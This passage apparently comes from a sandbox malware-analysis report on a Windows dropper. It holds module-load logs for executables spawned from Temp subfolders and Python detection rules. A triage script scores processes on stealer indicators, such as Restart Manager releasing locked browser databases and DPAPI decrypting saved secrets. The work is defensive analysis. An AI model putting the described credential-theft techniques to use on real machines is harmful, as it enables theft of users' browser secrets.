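USER_WRITABLE_RE = re.compile(r'^C:\\Users\\[^\\]+\\(Documents|AppData|Downloads|Desktop)\\', re.I)
TEMP_EXE_RE = re.compile(r'\\AppData\\Local\\Temp\\[^\\]+\\[^\\]+\.exe$', re.I)


def detect_dropper_fanout(spawns, min_children=3):
    """Return {parent: [images]} for parents in a user-writable folder that launch at least
    min_children distinct executables out of subfolders of the user's Temp directory."""
    fanout = defaultdict(list)
    for s in spawns:
        if USER_WRITABLE_RE.match(s.parent) and TEMP_EXE_RE.search(s.image):
            if s.image not in fanout[s.parent]:
                fanout[s.parent].append(s.image)
    return {p: imgs for p, imgs in fanout.items() if len(imgs) >= min_children}


if __name__ == '__main__':
    rows = parse_rows(REPORT_ROWS)
    for parent, (killed, url) in detect_credential_flusher(rows).items():
        print(f'[credential-flusher] {parent}\n  killed: {sorted(killed)}\n  kiosk: {url}')
    for parent, imgs in detect_dropper_fanout(rows).items():
        print(f'[dropper-fanout] {parent} launched {len(imgs)} executables from Temp subfolders')
```

Run against the rows above, the first rule fires only on 1b3b76c439.exe (the Firefox parent that re-spawns the kiosk child has killed nothing, so it stays quiet) and the second fires only on skotes.exe; EBFBFBFIIJ.exe, which launches a single Temp executable, stays below the threshold. Ordering matters in the first rule: a kiosk launch that precedes the kills is a weaker signal and is deliberately not counted.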
Source: C:\Users\user\Desktop\file.exe  Section loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dpapi.dll, cryptbase.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, ntmarta.dll, mozglue.dll, wsock32.dll, vcruntime140.dll, msvcp140.dll, uxtheme.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe  Section loaded: apphelp.dll
Source: C:\Users\user\Documents\EBFBFBFIIJ.exe  Section loaded: apphelp.dll, winmm.dll, wininet.dll, sspicli.dll, kernel.appcore.dll, uxtheme.dll, mstask.dll, windows.storage.dll, wldp.dll, mpr.dll, dui70.dll, duser.dll, chartv.dll, onecoreuapcommonproxystub.dll, oleacc.dll, atlthunk.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, wtsapi32.dll, winsta.dll, textshaping.dll, propsys.dll, windows.staterepositoryps.dll, windows.fileexplorer.common.dll, iertutil.dll, explorerframe.dll, profapi.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe  Section loaded: apphelp.dll, winmm.dll, wininet.dll, sspicli.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, uxtheme.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1012278001\rhnew.exe  Section loaded: apphelp.dll, winmm.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, kernel.appcore.dll, uxtheme.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exe  Section loaded: apphelp.dll, winmm.dll, msimg32.dll, wininet.dll, msvcr100.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe  Section loaded: apphelp.dll, winmm.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, kernel.appcore.dll, uxtheme.dll, dpapi.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, ondemandconnroutehelper.dll (logged six times in succession)
Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exe  Section loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe (second instance)  Section loaded: winmm.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, dpapi.dll, kernel.appcore.dll, uxtheme.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012282001\1b3b76c439.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1012281001\6ae2430bb1.exeSection loaded: netutils.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                          Source: file.exeStatic file information: File size 1823744 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\1012279001\e6d73861f4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: file.exeStatic PE information: Raw size of oswdvyxj is bigger than: 0x100000 < 0x1a3600
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2761636482.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2761247408.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation

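The module-load rows above are raw observations; to make them actionable an analyst groups them per process and asks what each loaded module implies. The script below is an added example written for this page, not Joe Sandbox code. It parses rows in the report's "Source: <process> Section loaded: <dll>" form (with or without a column separator), counts how many Winsock name-resolution rounds a process went through (the napinsp/pnrpnsp/wshbth/nlaapi/mswsock/dnsapi/winrnr/fwpuclnt chain that ws2_32 loads on every lookup, which is why 1b3b76c439.exe accounts for so many rows), and scores processes on module loads typical of credential stealers: rstrtmgr.dll (Restart Manager, used to release locks on open browser databases), dpapi.dll (CryptUnprotectData on saved browser secrets) and the SChannel/WinHTTP/WinINet network stack. The indicator weights are an analyst heuristic, not a sandbox rule, and the sample rows embedded in the script are a constructed subset copied from the list above.

```python
"""Per-process triage of 'Section loaded' rows from a sandbox report.
Heuristic weights and meanings are analyst choices, not sandbox rules."""
import re
from collections import OrderedDict

# Accepts the report's row format with or without a column separator.
ROW = re.compile(r"Source:\s*(?P<proc>\S+?\.exe)\s*\|?\s*Section loaded:\s*(?P<dll>\S+)", re.I)

# module -> (weight, why it matters); tune for your environment
INDICATORS = {
    "rstrtmgr.dll": (3, "Restart Manager: frees locks on open browser databases"),
    "dpapi.dll":    (3, "DPAPI: CryptUnprotectData on saved browser secrets"),
    "schannel.dll": (1, "SChannel TLS: encrypted outbound channel"),
    "winhttp.dll":  (1, "WinHTTP client"),
    "wininet.dll":  (1, "WinINet client"),
    "ncrypt.dll":   (1, "CNG key handling (TLS or credential decryption)"),
    "wbemcomn.dll": (1, "WMI client: host/VM fingerprinting"),
    "amsi.dll":     (1, "AMSI engaged: WMI queries or scripts are being scanned"),
}
NSP_CHAIN_HEAD = "napinsp.dll"      # first provider ws2_32 loads per resolution round
TEMP_DIR = "\\appdata\\local\\temp\\"

# Constructed sample: a subset of the rows in the report above.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1012280001\fc1511c233.exe | Section loaded: amsi.dll
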